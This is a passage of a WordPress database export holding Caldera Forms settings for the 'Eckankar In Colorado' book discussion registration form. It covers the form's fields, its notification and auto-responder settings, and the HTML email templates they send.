align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(39,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Wed, 28 Apr 2021 02:05:31 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:143:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>												\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8015:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 0px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; font-size: 13px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Request</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-size: 13px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this form, please feel free to contact the <a class=\"\" href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact 